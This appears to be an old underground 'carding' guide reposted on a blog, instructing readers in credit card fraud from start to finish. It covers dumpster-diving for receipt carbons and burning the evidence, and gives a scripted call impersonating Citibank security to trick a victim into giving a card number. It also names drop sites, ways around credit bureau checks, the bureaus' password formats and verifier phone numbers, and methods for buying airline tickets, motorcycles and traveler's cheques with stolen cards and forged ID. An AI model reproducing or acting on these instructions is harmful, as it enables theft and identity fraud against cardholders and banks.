FIRST- Go trashing. That is, go in back of a bank, department store (make sure it is not in a mall!), or other store which accepts credit cards. When the coast is clear, jump in their trash bin. Rummage around a bit. Having a look out might prove to be wise. What you are looking for are carbons - the carbon paper which the salesperson throws out after a purchase has been made. Remember these? It is the device that guarantees you (a legit customer) get a receipt of your credit card purchase, and also that the store gets a copy for record keeping. Once you find these, (and making sure you don't rip them) put them in
a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the light, and copy down everything you think is important. Card Number, expiration date, name, address, bank name, etc... Then BURN the carbons. This destroys all evidence that you ever had them. From here, you are set. Order away!
SECOND- If you have a friend that works in a store which performs credit card transactions, you might save yourself the trouble of banana peals on your head and ask him/her if they might not mind slipping the carbons into a bag after they ring up a sale. (or have them copy everything down for you.)
THIRD- You might try bullshitting people and getting their cards. You have to be VERY good, and the person has to be VERY stupid for this to work. In my mind, it is a waste of time, and almost never works. (Because people where I live are smart, of course..) I am presenting this to you in case you live in a society of morons. Exploit every area that you possibly can. The conversation might go something like this:
YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We have had a computer breakdown and no more of your VISA transactions can be processed since we lost your credit card number. Do you think that you can give me your number again, so I can re-enter it right now?"
Mrs. Davis: "Wait a minute, who is this again?"
YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole
situation to her again )"
Mrs. Davis: "I don't know about this. Can I call you back at a number?"
YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at
my office. Its 555-1212 (pay phone, loop, or bridge which you are at)"
Mrs. Davis: "Ok, bye!"
<CLICK>
<RING...>
YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?"
Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx-
xxx-xxx-xxx... "
YOU: "Thank you. We will try to restore your credit limit as soon as possible.
Until then, please refrain from trying to purchase merchandise on your Citibank
Visa Card. Goodbye."
<CLICK>
Neat, huh?
FOURTH- If are a really advanced Carder, you can get fancy and use a credit card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so quick. Although several do exist, and I do have a couple of them, I am in a situation in which I am unable to reveal it. If you are particularly smart and intelligent, you can develop it yourself. Actually, it is not that hard if you have the means. MAYBE if you are good at math....
FIFTH- You may try to get credit cards from other people. (friends?) I strongly recommend against this. Usually the cards you get from other people have usually already been used and are either being watched or are already dead.
SIXTH- If you have access to a Credit Union, you can call and "pull" someone else's account. (For instance, if you know someone's name and address, or social security, you can take a look at all of their loans and credit cards. )
IX. Advanced "Carding" Techniques
Please, people, I beg of you -- If you have not been carding for a year or two (AT LEAST) do not read this information. It will only confuse you, and even if you understand it, it will not work as it should unless you have the experience you are lacking. So sit tight and practice with parts I-VIII. PLEASE!
If, perchance, you happen to have the experience necessary to read on, then enjoy this. The following are simply a few details, hints, etc, that I just left out of the original manuscript due to my horrendous memory. Add to it if you like, and pass it a long. We all need to help each other if we are going to survive. Also, the following are in no particular order except that which they come to my head.
1) For a drop site, you can try to get fancy if need be. I have heard of empty military huts being used as well as empty condos, empty houses whose owners are on vacation, and about a zillion other stories. If you think you have come across something new, think a plan up, think it over, and think it over again. Make sure you have every step down so when you order, pick up, and make your
escape, there are no problems. Think about it . . . what harm does it do to spend an hour making sure you didn't overlook something. It is a lot better than going there and getting caught.
2) Sometimes the places you order from will have an online account with a credit record bureau. (Such as TRW, CBI or Transunion) The horrifying fact is that they can verify ONLINE ANY information that you give them. So, you're busted, right? Wrong . . . If this happens, there is nothing you can do unless you have a lot of power with phones. Chances are, you don't. So play it cool and give an excuse to get off the phone. Just try somewhere else. Also, if you don't do this right, you will probably kill the credit card.
X. Credit Unions
Credit Unions basically are databases that hold information of its members. When you apply for a credit card, I think that the application to be a member of a Credit Union is presented also. Since almost EVERY person who owns a credit card has personal information in at least one of these services, then there is no fooling he who has access to these services. Many times in your carding career, you will run into a business who has an online connection to
such unions. If you try to present false information they will catch you and follow up with the appropriate actions. (That is, report the credit card you said is yours as dead, call the authorities, etc, etc.)
Two of the major Credit Bureaus in the United States are TRW and CBI. As these two services hold large bases of information on its members (ie, every credit card holder in America), many unauthorized personnel often wish to gain
access to them. They are accessed through a computer by calling a Bureau port and entering authorization passwords.
For CBI, the passwords are in the format of nnnllnnn-**, where n=a number 0-9; where l=a letter from a-z; and where *=any character.
For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same
key as CBI.)
As you can see from the length and complexity of these passwords, it is literally impossible to hack them. (ie, hack in the sense guess them.) So you are probably wondering how unauthorized persons gain access, huh? Well, we either have inside information or we go trashing. That's it.
Right now, however, I am not going to go any further into the subject of credit unions. Be aware that they exist, and they can help you as well as hurt you if you don't know what you are doing. At a later date I plan on devoting an entire file to the subject of credit unions, as I haven't seen an up-to-date file in years.
That's about all. I wish you all good luck, and may your adventures be safe and fun-filled. And if I EVER catch any of you giving out the credit formula (once you discover it..) I am going to personally fly over and kick your ass. (remember- I have carded tickets around the country many times. There is nothing to stop me from visiting YOUR town.. hahaha)
One final note -- VISA is planning on changing their credit formula within a few years. So if you happen to be reading this many a year down the line, you will most likely discover that some of this is no longer valid. DON'T BLAME ME. It was valid at the time when I compiled it.
APPENDIX A
----------
Credit Card Formats
-------------------
American Express -- xxxx xxxxxx xxxxx
\/ \/ \/
/ | \
/ | \
4 digits 6 digits 5 digits
VISA -- xxxx xxxx xxxx xxxx
\_________________/
4 digits each group
OR
-- xxxx xxx xxx xxx
\/ \_________/
/ 3 digits each
4 digits
Mastercard -- xxxx xxxx xxxx xxxx
\_________________/
4 digits each group
Discover -- xxxx xxxx xxxx xxxx
\_________________/
4 digits each group.
APPENDIX B
----------
Credit Verifiers
1800-554-2265. Use '#' (pound) as control key.
Card Type: 10 = Mastercard
20 = Visa
Bank Identification: 1067
Merchant Number(s): 1411
52
IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your
credit card before they let you listen. You might try calling one of these and
using it for a while if you have nothing else.
APPENDIX C
----------
Other Things to Do
1] Plane Tickets
It is relatively easy to order plane tickets using a credit card nowadays. And, for convenience, you can order over the phone. Well, look up your favorite airline, call them, and present them with the situation. You would like 2 executive class tickets to Florida [ Ed. Note - If you live in Florida, make it a trip to California ] round trip to be billed to your Visa Credit Card. Oh
sure, maam. My credit card number is <blank>. My expiration date is <blank>. My Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. Oh, and maam, could you PLEEAZE hold the tickets at the airport for me. I will present some identification to pick them up there. Thank you.
It is relatively easy to do this. But, there are a few catches.
A.) Do NOT stay for any long period of time at any one place. After few days, the airline will catch on to what you have done. My suggestion is that you stay for only about 2 to 3 days. Or, if you really want to stay for a long time, get a one way ticket to
wherever it is that you would like to go to. Stay however long
you want to stay and take another 1 way ticket home.
B.) If you plan on traveling around the country, catch one way tickets around from place to place. And please, USE DIFFERENT AIRLINES!
2] Motorcycles
Again, you would be surprised at the amount of work (or lack of it) required to acquire motorcycles on other people's credit cards. I believe you can all see the advantages, so let us get down to the procedure. First, set up an order under a corporate account. You can find these sometimes if you work in a store that would use such cards. (Look over shoulders) Well, I will leave to you the methods to come upon corporate account cards. Once you have them,
finish the procedure. Step 2 is to send an "employee" (yourself or a stupid friend) to pick it up. Bring proper identification that was issued from the corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail Box as your business number. It is very common for a high level employee to be absent from his desk. Use your imagination for the rest, and tidy it up to perfect it.
3] Travelers Cheques
OKAY, I will admit this is getting out of hand, but what the hell -- For those of you very daring and in possession of a very good form of false identification (Birth Certificate?), you can easily order some American Express Traveler's Cheques for your travels around the world. The number to call is 1-800-777-7337. Using your American Express Credit Card, order some of these "babies" in another name. (For a gift..) Have them delivered as you deem appropriate. Enjoy them thouroughly.
Subscribe to:
Posts (Atom)